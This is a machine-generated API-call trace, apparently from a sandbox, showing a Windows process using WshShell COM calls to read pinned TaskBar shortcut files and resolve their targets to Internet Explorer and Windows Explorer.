[0166.978] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0166.978] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x283d88) returned 0x0 [0166.978] WshShell:IDispatch:Invoke (in: This=0x283d88, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0166.978] SysStringLen (param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned 0x35 [0166.979] WshShell:IUnknown:Release (This=0x283d88) returned 0x2 [0166.979] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0166.979] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x283d88) returned 0x0 [0166.979] WshShell:IDispatch:Invoke (in: This=0x283d88, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0166.979] SysStringLen (param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned 0x35 [0166.979] WshShell:IUnknown:Release (This=0x283d88) returned 0x2 [0166.979] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 0x20 [0166.979] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk")) returned 0x20 [0166.980] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x79 [0166.980] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk", nBufferLength=0x79, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk", lpFilePart=0x0) returned 0x78 [0166.980] CoGetContextToken (in: pToken=0x5a0dba4 | out: pToken=0x5a0dba4) returned 0x0 [0166.980] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc10 | out: ppvObject=0x5a0dc10*=0x283d20) returned 0x0 [0166.980] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4, pExcepInfo=0x5a0df84, puArgErr=0x5a0df80 | out: pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x283dc0, varVal2=0x0), pExcepInfo=0x5a0df84*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df80*=0x0) returned 0x0 [0166.983] WshShell:IUnknown:QueryInterface (in: This=0x283dc0, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da3c | out: ppvObject=0x5a0da3c*=0x283dd0) returned 0x0 [0166.983] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d9f0 | out: ppvObject=0x5a0d9f0*=0x0) returned 0x80004002 [0166.983] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d818 | out: ppvObject=0x5a0d818*=0x283de0) returned 0x0 [0166.983] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x283de0, ppTI=0x5a0d820 | out: ppTI=0x5a0d820*=0x5c3dcf8) returned 0x0 [0166.983] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c | out: ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c) returned 0x0 [0166.983] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0166.984] WshShell:IUnknown:Release (This=0x283de0) returned 0x2 [0166.984] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x5 [0166.984] WshShell:IUnknown:AddRef (This=0x283dd0) returned 0x3 [0166.984] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d34c | out: ppvObject=0x5a0d34c*=0x0) returned 0x80004002 [0166.984] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d2fc | out: ppvObject=0x5a0d2fc*=0x0) returned 0x80004002 [0166.984] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d308 | out: ppvObject=0x5a0d308*=0x0) returned 0x80004002 [0166.984] CoGetContextToken (in: pToken=0x5a0d368 | out: pToken=0x5a0d368) returned 0x0 [0166.984] CoGetContextToken (in: pToken=0x5a0d77c | out: pToken=0x5a0d77c) returned 0x0 [0166.984] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d7fc | out: ppvObject=0x5a0d7fc*=0x0) returned 0x80004002 [0166.985] WshShell:IUnknown:Release (This=0x283dd0) returned 0x2 [0166.985] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0166.985] CoGetContextToken (in: pToken=0x5a0de04 | out: pToken=0x5a0de04) returned 0x0 [0166.985] CoGetContextToken (in: pToken=0x5a0dd64 | out: pToken=0x5a0dd64) returned 0x0 [0166.985] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x5a0de34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0de30 | out: ppvObject=0x5a0de30*=0x283dc0) returned 0x0 [0166.985] WshShell:IUnknown:AddRef (This=0x283dc0) returned 0x3 [0166.985] WshShell:IUnknown:Release (This=0x283dc0) returned 0x2 [0166.985] WshShell:IDispatch:GetTypeInfoCount (in: This=0x283dc0, pctinfo=0x5a0de8c | out: pctinfo=0x5a0de8c) returned 0x0 [0166.985] WshShell:IDispatch:GetTypeInfo (in: This=0x283dc0, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0de88 | out: ppTInfo=0x5a0de88*=0x5c3dcf8) returned 0x0 [0166.985] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d98c | out: ppvObject=0x5a0d98c*=0x5c3dcf8) returned 0x0 [0166.985] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x6 [0166.985] CoGetContextToken (in: pToken=0x5a0dcac | out: pToken=0x5a0dcac) returned 0x0 [0166.985] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x7 [0166.985] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x6 [0166.985] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x5 [0166.985] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2) returned 0x0 [0166.986] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0166.986] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0166.986] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x283dc0) returned 0x0 [0166.986] WshShell:IDispatch:Invoke (in: This=0x283dc0, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\explorer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0166.986] SysStringLen (param_1="C:\\Windows\\explorer.exe") returned 0x17 [0166.986] WshShell:IUnknown:Release (This=0x283dc0) returned 0x2 [0166.986] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0166.986] WshShell:IUnknown:QueryInterface (in: This=0x283dd0, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x283dc0) returned 0x0 [0166.986] WshShell:IDispatch:Invoke (in: This=0x283dc0, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\explorer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0166.986] SysStringLen (param_1="C:\\Windows\\explorer.exe") returned 0x17 [0166.987] WshShell:IUnknown:Release (This=0x283dc0) returned 0x2 [0166.987] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk")) returned 0x20 [0166.987] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 0x20 [0166.988] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x75 [0166.988] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", nBufferLength=0x75, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", lpFilePart=0x0) returned 0x74 [0167.001] CoGetContextToken (in: pToken=0x5a0dba4 | out: pToken=0x5a0dba4) returned 0x0 [0167.001] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc10 | out: ppvObject=0x5a0dc10*=0x283d20) returned 0x0 [0167.002] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4, pExcepInfo=0x5a0df84, puArgErr=0x5a0df80 | out: pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2851a8, varVal2=0x0), pExcepInfo=0x5a0df84*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df80*=0x0) returned 0x0 [0167.005] WshShell:IUnknown:QueryInterface (in: This=0x2851a8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da3c | out: ppvObject=0x5a0da3c*=0x2851b8) returned 0x0 [0167.005] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d9f0 | out: ppvObject=0x5a0d9f0*=0x0) returned 0x80004002 [0167.005] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d818 | out: ppvObject=0x5a0d818*=0x2851c8) returned 0x0 [0167.005] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x2851c8, ppTI=0x5a0d820 | out: ppTI=0x5a0d820*=0x5c3dcf8) returned 0x0 [0167.005] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c | out: ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c) returned 0x0 [0167.005] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0167.005] WshShell:IUnknown:Release (This=0x2851c8) returned 0x2 [0167.005] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x5 [0167.006] WshShell:IUnknown:AddRef (This=0x2851b8) returned 0x3 [0167.006] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d34c | out: ppvObject=0x5a0d34c*=0x0) returned 0x80004002 [0167.006] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d2fc | out: ppvObject=0x5a0d2fc*=0x0) returned 0x80004002 [0167.006] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d308 | out: ppvObject=0x5a0d308*=0x0) returned 0x80004002 [0167.006] CoGetContextToken (in: pToken=0x5a0d368 | out: pToken=0x5a0d368) returned 0x0 [0167.006] CoGetContextToken (in: pToken=0x5a0d77c | out: pToken=0x5a0d77c) returned 0x0 [0167.006] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d7fc | out: ppvObject=0x5a0d7fc*=0x0) returned 0x80004002 [0167.006] WshShell:IUnknown:Release (This=0x2851b8) returned 0x2 [0167.006] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.006] CoGetContextToken (in: pToken=0x5a0de04 | out: pToken=0x5a0de04) returned 0x0 [0167.007] CoGetContextToken (in: pToken=0x5a0dd64 | out: pToken=0x5a0dd64) returned 0x0 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x5a0de34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0de30 | out: ppvObject=0x5a0de30*=0x2851a8) returned 0x0 [0167.007] WshShell:IUnknown:AddRef (This=0x2851a8) returned 0x3 [0167.007] WshShell:IUnknown:Release (This=0x2851a8) returned 0x2 [0167.007] WshShell:IDispatch:GetTypeInfoCount (in: This=0x2851a8, pctinfo=0x5a0de8c | out: pctinfo=0x5a0de8c) returned 0x0 [0167.007] WshShell:IDispatch:GetTypeInfo (in: This=0x2851a8, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0de88 | out: ppTInfo=0x5a0de88*=0x5c3dcf8) returned 0x0 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d98c | out: ppvObject=0x5a0d98c*=0x5c3dcf8) returned 0x0 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d940 | out: ppvObject=0x5a0d940*=0x0) returned 0x80004002 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d768 | out: ppvObject=0x5a0d768*=0x0) returned 0x80004002 [0167.007] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x8 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d29c | out: ppvObject=0x5a0d29c*=0x0) returned 0x80004002 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d24c | out: ppvObject=0x5a0d24c*=0x0) returned 0x80004002 [0167.007] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d258 | out: ppvObject=0x5a0d258*=0x0) returned 0x80004002 [0167.008] CoGetContextToken (in: pToken=0x5a0d2b8 | out: pToken=0x5a0d2b8) returned 0x0 [0167.008] CoGetContextToken (in: pToken=0x5a0d6cc | out: pToken=0x5a0d6cc) returned 0x0 [0167.008] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d74c | out: ppvObject=0x5a0d74c*=0x0) returned 0x80004002 [0167.008] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.008] CoGetContextToken (in: pToken=0x5a0dcac | out: pToken=0x5a0dcac) returned 0x0 [0167.008] CoGetContextToken (in: pToken=0x5a0dc0c | out: pToken=0x5a0dc0c) returned 0x0 [0167.008] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x5a0dcdc*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dcd8 | out: ppvObject=0x5a0dcd8*=0x5c3dcf8) returned 0x0 [0167.008] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x9 [0167.008] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x8 [0167.008] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.008] 